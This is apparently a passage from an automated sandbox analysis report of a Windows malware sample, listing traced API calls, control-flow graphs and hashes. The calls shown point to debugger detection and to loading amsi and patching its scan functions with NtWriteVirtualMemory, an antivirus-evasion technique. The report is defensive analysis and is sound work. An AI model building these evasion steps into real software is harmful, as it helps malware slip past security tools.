                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AB2
                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AD0
                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B85AEE
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B85B37
                          • RegQueryValueExA.ADVAPI32(?,02B85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001), ref: 02B85B55
                          • RegCloseKey.ADVAPI32(?,02B85B84,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B85B77
                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B85B94
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B85BA1
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B85BA7
                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B85BD2
                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C19
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C29
                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C51
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C61
                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B85C87
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B85C97
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1759228003-2375825460
                          • Opcode ID: c5377b95b68045f544ac043e00e60ce5c447c9c4ad9617e02eee636367ff3a98
                          • Instruction ID: 06649c1b97eb25c812fd971c42be33ce8a154b57e3a7e2509423c210bfd99aae
                          • Opcode Fuzzy Hash: c5377b95b68045f544ac043e00e60ce5c447c9c4ad9617e02eee636367ff3a98
                          • Instruction Fuzzy Hash: A7517271A5020C7AFB31EAA88C46FEFB7AD9B04744F8101E1A64CE6181DB749A44CF61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5647 2b9ebf0-2b9ec0a GetModuleHandleW 5648 2b9ec0c-2b9ec1e GetProcAddress 5647->5648 5649 2b9ec36-2b9ec3e 5647->5649 5648->5649 5650 2b9ec20-2b9ec30 CheckRemoteDebuggerPresent 5648->5650 5650->5649 5651 2b9ec32 5650->5651 5651->5649
                          APIs
                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B9EC00
                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B9EC12
                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B9EC29
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                          • API String ID: 35162468-539270669
                          • Opcode ID: 416b73574a0ec690f650ed304071fd1df158ae3a425129fab880b352320edf44
                          • Instruction ID: f8bd5b56870205a95a0b051ac978182eeba31eba343d15831c25445f4e4e8da2
                          • Opcode Fuzzy Hash: 416b73574a0ec690f650ed304071fd1df158ae3a425129fab880b352320edf44
                          • Instruction Fuzzy Hash: 7AF0A77090828CBBDF25E7A888897DCFBB99B05328F6403E5F464611D1E7754644C651

                          Control-flow Graph

                          APIs
                            • Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA
                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DBEB
                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DC1B
                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B9DC30
                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B9DC5C
                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B9DC65
                            • Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                          • String ID:
                          • API String ID: 2659941336-0
                          • Opcode ID: edf0f4e4a83c0194943acf65ede55866b49e02e84f9d3953b3aceaba14c0ba42
                          • Instruction ID: 05f6ddadbb77b1b73633a9bd3330c3c4505ba153439df8648ee6345c9da9b01f
                          • Opcode Fuzzy Hash: edf0f4e4a83c0194943acf65ede55866b49e02e84f9d3953b3aceaba14c0ba42
                          • Instruction Fuzzy Hash: 7F21BE71A50309BEEB11EAA4CC46FDEB7BDAB49700F5004A1F704E7181DAB4AA058BA5

                          Control-flow Graph

                          APIs
                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B9E436
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: CheckConnectionInternet
                          • String ID: Initialize$OpenSession$ScanBuffer
                          • API String ID: 3847983778-3852638603
                          • Opcode ID: c9bda85c863765acb5c1b6f75b978e07564652d90abb7074abb57471ef958434
                          • Instruction ID: 0f421fb79fafcce328faf3b59a115f4d0a136c8e67dfcb6ac61224242e3baa54
                          • Opcode Fuzzy Hash: c9bda85c863765acb5c1b6f75b978e07564652d90abb7074abb57471ef958434
                          • Instruction Fuzzy Hash: 17411A35A50109AFEF10FBA4C880A9EB3FAEF8D710F2148B6E145A7250DA75ED05CF61

                          Control-flow Graph

                          APIs
                            • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                            • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                            • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                            • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                            • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                          • String ID: Ntdll$yromeMlautriVetirW
                          • API String ID: 2719805696-3542721025
                          • Opcode ID: 19cab1c90364cac34d5bf163d149575017ddad3ddd36c62028e8cb5d04880178
                          • Instruction ID: e094ef83edf11302806c6ba056f9d0212032e2f9fe6f7aa7b7911ea9d88f5965
                          • Opcode Fuzzy Hash: 19cab1c90364cac34d5bf163d149575017ddad3ddd36c62028e8cb5d04880178
                          • Instruction Fuzzy Hash: C50100B5610205BFEF00EFA8D841E9EB7FDEB49710F9184A1F508D7A50DA70AD10DB64
                          APIs
                            • Part of subcall function 02B96CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02B96D41,?,?,?,00000000), ref: 02B96D21
                          • CoCreateInstance.OLE32(?,00000000,00000005,02B96E34,00000000,00000000,02B96DB3,?,00000000,02B96E23), ref: 02B96D9F
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: CreateFromInstanceProg
                          • String ID:
                          • API String ID: 2151042543-0
                          • Opcode ID: 844ce991050213c7e4c6c7711024c96a84a136f00df133a29fed2a8a42122533
                          • Instruction ID: b39a8014757d4a89ff599e240ba940b06504358eab89bdd22ad5856ccb602f0e
                          • Opcode Fuzzy Hash: 844ce991050213c7e4c6c7711024c96a84a136f00df133a29fed2a8a42122533
                          • Instruction Fuzzy Hash: E201F271608B04AFEB05EF65DC5296BBBBDEB49B10B5244B6F905D2650E6308E10C960

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5572 2b81724-2b81736 5573 2b81968-2b8196d 5572->5573 5574 2b8173c-2b8174c 5572->5574 5575 2b81a80-2b81a83 5573->5575 5576 2b81973-2b81984 5573->5576 5577 2b8174e-2b8175b 5574->5577 5578 2b817a4-2b817ad 5574->5578 5582 2b81a89-2b81a8b 5575->5582 5583 2b81684-2b816ad VirtualAlloc 5575->5583 5579 2b81938-2b81945 5576->5579 5580 2b81986-2b819a2 5576->5580 5584 2b8175d-2b8176a 5577->5584 5585 2b81774-2b81780 5577->5585 5578->5577 5581 2b817af-2b817bb 5578->5581 5579->5580 5586 2b81947-2b8195b Sleep 5579->5586 5591 2b819b0-2b819bf 5580->5591 5592 2b819a4-2b819ac 5580->5592 5581->5577 5593 2b817bd-2b817c9 5581->5593 5594 2b816df-2b816e5 5583->5594 5595 2b816af-2b816dc call 2b81644 5583->5595 5587 2b8176c-2b81770 5584->5587 5588 2b81794-2b817a1 5584->5588 5589 2b817f0-2b817f9 5585->5589 5590 2b81782-2b81790 5585->5590 5586->5580 5596 2b8195d-2b81964 Sleep 5586->5596 5602 2b817fb-2b81808 5589->5602 5603 2b8182c-2b81836 5589->5603 5598 2b819d8-2b819e0 5591->5598 5599 2b819c1-2b819d5 5591->5599 5597 2b81a0c-2b81a22 5592->5597 5593->5577 5600 2b817cb-2b817de Sleep 5593->5600 5595->5594 5596->5579 5609 2b81a3b-2b81a47 5597->5609 5610 2b81a24-2b81a32 5597->5610 5606 2b819fc-2b819fe call 2b815cc 5598->5606 5607 2b819e2-2b819fa 5598->5607 5599->5597 5600->5577 5604 2b817e4-2b817eb Sleep 5600->5604 5602->5603 5608 2b8180a-2b8181e Sleep 5602->5608 5611 2b818a8-2b818b4 5603->5611 5612 2b81838-2b81863 5603->5612 5604->5578 5617 2b81a03-2b81a0b 5606->5617 5607->5617 5608->5603 5619 2b81820-2b81827 Sleep 5608->5619 5613 2b81a68 5609->5613 5614 2b81a49-2b81a5c 5609->5614 5610->5609 5620 2b81a34 5610->5620 5615 2b818dc-2b818eb call 2b815cc 5611->5615 5616 2b818b6-2b818c8 5611->5616 5621 2b8187c-2b8188a 5612->5621 5622 2b81865-2b81873 5612->5622 5624 2b81a6d-2b81a7f 5613->5624 5614->5624 5625 2b81a5e-2b81a63 call 2b81500 5614->5625 5633 2b818fd-2b81936 5615->5633 5637 2b818ed-2b818f7 5615->5637 5628 2b818ca 5616->5628 5629 2b818cc-2b818da 5616->5629 5619->5602 5620->5609 5626 2b818f8 5621->5626 5627 2b8188c-2b818a6 call 2b81500 5621->5627 5622->5621 5623 2b81875 5622->5623 5623->5621 5625->5624 5626->5633 5627->5633 5628->5629 5629->5633
                          APIs
                          • Sleep.KERNEL32(00000000,?,02B82000), ref: 02B817D0
                          • Sleep.KERNEL32(0000000A,00000000,?,02B82000), ref: 02B817E6
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: dcbeaecd44160ed00bb6c443458a14230e2c632fdb58d54930102f9940a38e05
                          • Instruction ID: 4659c0edcf4ed7d2172b18ebae85d2bc287b7919121400b5240255bb426656ce
                          • Opcode Fuzzy Hash: dcbeaecd44160ed00bb6c443458a14230e2c632fdb58d54930102f9940a38e05
                          • Instruction Fuzzy Hash: 41B10E76A123418BDB15EF2CD890395BBE1EB85390F0886AED55DCF285E770E452CB90

                          Control-flow Graph

                          APIs
                          • LoadLibraryW.KERNEL32(amsi), ref: 02B98715
                            • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                            • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                            • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                            • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B98774
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                          • String ID: DllGetClassObject$W$amsi
                          • API String ID: 941070894-2671292670
                          • Opcode ID: c566c85ba6d9c4aa4ad4b05de9c60ff6652dadfc482011fc61fbe8fdcf7fecca
                          • Instruction ID: 7300798bce4279369654a749e424877ccd92494a5b572c662c1d0fcac9e8f51e
                          • Opcode Fuzzy Hash: c566c85ba6d9c4aa4ad4b05de9c60ff6652dadfc482011fc61fbe8fdcf7fecca
                          • Instruction Fuzzy Hash: D4F0A4B010C38179E601E7748C45F4FBFCD4B52224F048AACF1E8562D2D679D10497A7

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5652 2b81a8c-2b81a9b 5653 2b81b6c-2b81b6f 5652->5653 5654 2b81aa1-2b81aa5 5652->5654 5655 2b81c5c-2b81c60 5653->5655 5656 2b81b75-2b81b7f 5653->5656 5657 2b81b08-2b81b11 5654->5657 5658 2b81aa7-2b81aae 5654->5658 5663 2b816e8-2b8170b call 2b81644 VirtualFree 5655->5663 5664 2b81c66-2b81c6b 5655->5664 5659 2b81b3c-2b81b49 5656->5659 5660 2b81b81-2b81b8d 5656->5660 5657->5658 5665 2b81b13-2b81b27 Sleep 5657->5665 5661 2b81adc-2b81ade 5658->5661 5662 2b81ab0-2b81abb 5658->5662 5659->5660 5674 2b81b4b-2b81b5f Sleep 5659->5674 5666 2b81b8f-2b81b92 5660->5666 5667 2b81bc4-2b81bd2 5660->5667 5670 2b81ae0-2b81af1 5661->5670 5671 2b81af3 5661->5671 5668 2b81abd-2b81ac2 5662->5668 5669 2b81ac4-2b81ad9 5662->5669 5683 2b8170d-2b81714 5663->5683 5684 2b81716 5663->5684 5665->5658 5672 2b81b2d-2b81b38 Sleep 5665->5672 5675 2b81b96-2b81b9a 5666->5675 5667->5675 5677 2b81bd4-2b81bd9 call 2b814c0 5667->5677 5670->5671 5676 2b81af6-2b81b03 5670->5676 5671->5676 5672->5657 5674->5660 5679 2b81b61-2b81b68 Sleep 5674->5679 5680 2b81bdc-2b81be9 5675->5680 5681 2b81b9c-2b81ba2 5675->5681 5676->5656 5677->5675 5679->5659 5680->5681 5688 2b81beb-2b81bf2 call 2b814c0 5680->5688 5685 2b81bf4-2b81bfe 5681->5685 5686 2b81ba4-2b81bc2 call 2b81500 5681->5686 5689 2b81719-2b81723 5683->5689 5684->5689 5690 2b81c2c-2b81c59 call 2b81560 5685->5690 5691 2b81c00-2b81c28 VirtualFree 5685->5691 5688->5681
                          APIs
                          • Sleep.KERNEL32(00000000,?,?,00000000,02B81FE4), ref: 02B81B17
                          • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B81FE4), ref: 02B81B31
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: ce04d7b0d056510b68052f454514901f0fc02d285d965b88d6881baf796bc048
                          • Instruction ID: 26725217c729d7ff251816e8f5c08fcca02ecd81aa265773516848e1e053c8bb
                          • Opcode Fuzzy Hash: ce04d7b0d056510b68052f454514901f0fc02d285d965b88d6881baf796bc048
                          • Instruction Fuzzy Hash: 6151EE716222408FE715EF6CC9847A6BBD0EF45314F1885EEE54CCB282E770C846CBA1

                          Control-flow Graph

                          APIs
                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B9E436
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: CheckConnectionInternet
                          • String ID: Initialize$OpenSession$ScanBuffer
                          • API String ID: 3847983778-3852638603
                          • Opcode ID: 22c35f11a8b72007e3651fa9d1b25c64aee6d52b5147cf307d994705840eff07
                          • Instruction ID: 739d1446f386749088442c03efebcaf91c96b8ad69653babc91da527cde85ad6
                          • Opcode Fuzzy Hash: 22c35f11a8b72007e3651fa9d1b25c64aee6d52b5147cf307d994705840eff07
                          • Instruction Fuzzy Hash: 0A410835A50109AFEB10FBA4C880A9EB3FAEF89710F2148B6E145A7250DA75ED05CF61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5831 2b8e2ec-2b8e2f8 5832 2b8e2fa-2b8e300 VariantClear call 2b8dfb8 5831->5832 5833 2b8e307-2b8e30c 5831->5833 5837 2b8e305 5832->5837 5835 2b8e31d-2b8e322 5833->5835 5836 2b8e30e-2b8e31b call 2b844ac 5833->5836 5839 2b8e32e-2b8e333 5835->5839 5840 2b8e324-2b8e32c 5835->5840 5841 2b8e363-2b8e366 5836->5841 5837->5841 5843 2b8e33e-2b8e349 call 2b92e2c 5839->5843 5844 2b8e335-2b8e33c call 2b8e170 5839->5844 5840->5841 5850 2b8e34b-2b8e355 5843->5850 5851 2b8e357-2b8e35e VariantClear VariantInit 5843->5851 5844->5841 5850->5841 5851->5841
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 14beb617443578ad59f747a29bb65dfdb10a2dd5eae48a511f3b8e1777693c0c
                          • Instruction ID: 1859afdcfd286aa93c3a75f9b7c87125ffbd20b7450086943ffe964d69a4c1ee
                          • Opcode Fuzzy Hash: 14beb617443578ad59f747a29bb65dfdb10a2dd5eae48a511f3b8e1777693c0c
                          • Instruction Fuzzy Hash: 45F0F660704200C7CB26BB38DCC4A6D279AAF81710B50D4F6F48E9B255CB34DC45DB62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5853 2b84cfc-2b84cfe 5854 2b84c0c-2b84c10 5853->5854 5855 2b84d04-2b84d0e SysAllocStringLen 5853->5855 5856 2b84c20 5854->5856 5857 2b84c12-2b84c1f SysFreeString 5854->5857 5858 2b84bdc-2b84be6 5855->5858 5859 2b84d14-2b84d1e SysFreeString 5855->5859 5857->5856 5861 2b84bf8 5858->5861 5862 2b84be8-2b84bf2 SysAllocStringLen 5858->5862 5862->5858 5862->5861
                          APIs
                          • SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
